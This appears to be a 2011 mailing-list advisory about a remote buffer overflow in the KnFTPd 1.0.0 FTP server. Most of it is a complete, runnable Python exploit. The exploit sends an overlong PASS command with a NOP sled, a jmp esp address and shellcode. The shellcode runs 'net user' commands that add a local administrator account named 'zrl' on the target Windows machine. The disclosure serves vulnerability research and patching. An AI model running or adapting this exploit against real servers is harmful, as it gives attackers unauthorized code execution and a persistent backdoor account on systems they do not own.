[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

KnFTPd v1.0.0 Multiple Command Remote Buffer Overflow



KnFTPd FTP Server v1.0.0 is vulnerable to a buffer overflow caused by improper bounds checking.
By sending an overly long request to Multpile FTP command(USER,PASS,REIN,QUIT,PORT,PASV,TYPE,STRU,MODE,RETR,STOR,
APPE,ALLO,REST,RNFR,RNTO,ABOR,DELE,CWD,LIST,NLST,SITE,STST,HELP,NOOP,MKD,RMD,PWD,CDUP,STOU,SNMT,SYST,XPWD), 
a remote attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges or cause the application to crash.

The sample PoC of exploit is shown as follows:
-----------------------------------------------
# !/usr/bin/python
# KnFTPd FTP Server v1.0.0 Multiple Command Remote Buffer Overflow Exploit
# Software Link: http://sourceforge.net/projects/knftp/files/KnFTPd/1.0.0/
# Affected Version:1.0.0
# Affected Command:
# "USER","PASS","REIN","QUIT","PORT","PASV","TYPE","STRU",
# "MODE","RETR","STOR","APPE","ALLO","REST","RNFR","RNTO",
# "ABOR","DELE","CWD","LIST","NLST","SITE","STST","HELP",
# "NOOP","MKD","RMD","PWD","CDUP","STOU","SNMT","SYST","XPWD"
#
# Vulnerability Discovered by Qixu Liu of NCNIPC (liuqx@xxxxxxxxxxx)
# Date: 02/09/2011
# Thanks to: Zhejun Fang, Cheng Luo
# Tested on: Windows XP SP3 Chinese (zh-cn)
# Shellcode: Exploiting "PASS" Command to add a new system user "zrl:123456" 

from struct import pack
import socket,sys
import os

if len(sys.argv) != 3:
    print "Usage: knftpd_exploit.py [IP] [PORT]"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])

shellcode= 	     "\x33\xdb\xb7\x02\x2b\xe3"
shellcode+=          "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c"
shellcode+=          "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
shellcode+=          "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"
shellcode+=          "\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64"
shellcode+=          "\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
shellcode+=          "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
shellcode+=          "\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20"
shellcode+=          "\x75\x73\x65\x72\x20\x7a\x72\x6c"

eip ="\x12\x45\xfa\x7f"	#jmp esp
eip += "\x90"*8
eip += "\xe9\x06\xff\xff\xff"
nops = "\x90" * 157

payload = "\x90" * 57 + shellcode + "\x90" * 94 +eip

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
    connect=s.connect((target, port))
    print "[+] Target FTP Connected!"
except:
    print "[!] FTP didn't respond\n"
    sys.exit(0)

s.send('USER test \r\n')
s.recv(1024)

print "[+] Sending payload...length " +str(len(payload))
s.send('PASS ' + payload +' \r\n')
s.recv(1024)
 
print "[!] Exploit has been sent!. Please check the new user 'zrl'\n"
s.close()